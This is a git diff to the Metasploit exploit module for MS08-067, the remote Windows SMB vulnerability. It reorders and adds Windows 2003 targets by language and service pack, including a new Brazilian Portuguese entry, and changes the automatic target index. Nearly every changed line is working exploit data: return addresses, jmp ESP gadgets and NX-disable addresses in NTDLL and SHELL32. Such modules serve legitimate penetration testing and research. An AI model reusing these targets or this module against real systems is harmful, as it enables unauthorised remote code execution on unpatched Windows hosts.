diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index a115dae584..6abb686312 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -88,6 +88,14 @@ class Metasploit3 < Msf::Exploit::Remote } ], # JMP ESI SVCHOST.EXE + # Standard return-to-ESI without NX bypass + ['Windows 2003 SP0 Universal', + { + 'Ret' => 0x0100129e, + 'Scratch' => 0x00020408, + } + ], # JMP ESI SVCHOST.EXE + # # ENGLISH TARGETS # @@ -128,79 +136,6 @@ class Metasploit3 < Msf::Exploit::Remote } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - # Standard return-to-ESI without NX bypass - ['Windows 2003 SP0 Universal', - { - 'Ret' => 0x0100129e, - 'Scratch' => 0x00020408, - } - ], # JMP ESI SVCHOST.EXE - - # Standard return-to-ESI without NX bypass - ['Windows 2003 SP1 English (NO NX)', - { - 'Ret' => 0x71bf21a2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI WS2HELP.DLL - - # Brett Moore's crafty NX bypass for 2003 SP1 - ['Windows 2003 SP1 English (NX)', - { - 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL - 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL - 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL - 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL - 'Scratch' => 0x00020408, - } - ], - - # Standard return-to-ESI without NX bypass - ['Windows 2003 SP1 Japanese (NO NX)', - { - 'Ret' => 0x71a921a2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI WS2HELP.DLL - - # Standard return-to-ESI without NX bypass - ['Windows 2003 SP2 English (NO NX)', - { - 'Ret' => 0x71bf3969, - 'Scratch' => 0x00020408, - } - ], # JMP ESI WS2HELP.DLL - - # Brett Moore's crafty NX bypass for 2003 SP2 - ['Windows 2003 SP2 English (NX)', - { - 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL - 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL - 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL - 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL - 'Scratch' => 0x00020408, - } - ], - - # Standard return-to-ESI without NX bypass - ['Windows 2003 SP2 German (NO NX)', - { - 'Ret' => 0x71a03969, - 'Scratch' => 0x00020408, - } - ], # JMP ESI WS2HELP.DLL - - # Brett Moore's crafty NX bypass for 2003 SP2 - ['Windows 2003 SP2 German (NX)', - { - 'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL - 'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL - 'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL - 'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL - 'Scratch' => 0x00020408, - } - ], - # # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED # @@ -637,12 +572,34 @@ class Metasploit3 < Msf::Exploit::Remote } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + # + # Windows 2003 Targets + # + # Standard return-to-ESI without NX bypass - # Provided by Masashi Fujiwara - ['Windows 2003 SP2 Japanese (NO NX)', + ['Windows 2003 SP1 English (NO NX)', { - 'Ret' => 0x71a91ed2, - 'Scratch' => 0x00020408 + 'Ret' => 0x71bf21a2, + 'Scratch' => 0x00020408, + } + ], # JMP ESI WS2HELP.DLL + + # Brett Moore's crafty NX bypass for 2003 SP1 + ['Windows 2003 SP1 English (NX)', + { + 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL + 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL + 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL + 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL + 'Scratch' => 0x00020408, + } + ], + + # Standard return-to-ESI without NX bypass + ['Windows 2003 SP1 Japanese (NO NX)', + { + 'Ret' => 0x71a921a2, + 'Scratch' => 0x00020408, } ], # JMP ESI WS2HELP.DLL @@ -665,6 +622,54 @@ class Metasploit3 < Msf::Exploit::Remote } ], + # Standard return-to-ESI without NX bypass + ['Windows 2003 SP2 English (NO NX)', + { + 'Ret' => 0x71bf3969, + 'Scratch' => 0x00020408, + } + ], # JMP ESI WS2HELP.DLL + + # Brett Moore's crafty NX bypass for 2003 SP2 + ['Windows 2003 SP2 English (NX)', + { + 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL + 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL + 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL + 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL + 'Scratch' => 0x00020408, + } + ], + + # Standard return-to-ESI without NX bypass + ['Windows 2003 SP2 German (NO NX)', + { + 'Ret' => 0x71a03969, + 'Scratch' => 0x00020408, + } + ], # JMP ESI WS2HELP.DLL + + # Brett Moore's crafty NX bypass for 2003 SP2 + ['Windows 2003 SP2 German (NX)', + { + 'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL + 'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL + 'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL + 'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL + 'Scratch' => 0x00020408, + } + ], + + # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas) + [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)', + { + 'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL OK + 'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL OK + 'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL OK + 'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL + 'Scratch' => 0x00020408, + } + ], # Standard return-to-ESI without NX bypass ['Windows 2003 SP2 Spanish (NO NX)', { @@ -682,7 +687,16 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL 'Scratch' => 0x00020408, } - ] + ], + + # Standard return-to-ESI without NX bypass + # Provided by Masashi Fujiwara + ['Windows 2003 SP2 Japanese (NO NX)', + { + 'Ret' => 0x71a91ed2, + 'Scratch' => 0x00020408 + } + ], # JMP ESI WS2HELP.DLL # # Missing Targets @@ -826,7 +840,7 @@ class Metasploit3 < Msf::Exploit::Remote # Windows 2003 SP0 is mostly universal if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack' - mytarget = targets[7] + mytarget = targets[3] end # Windows 2003 R2 is treated the same as 2003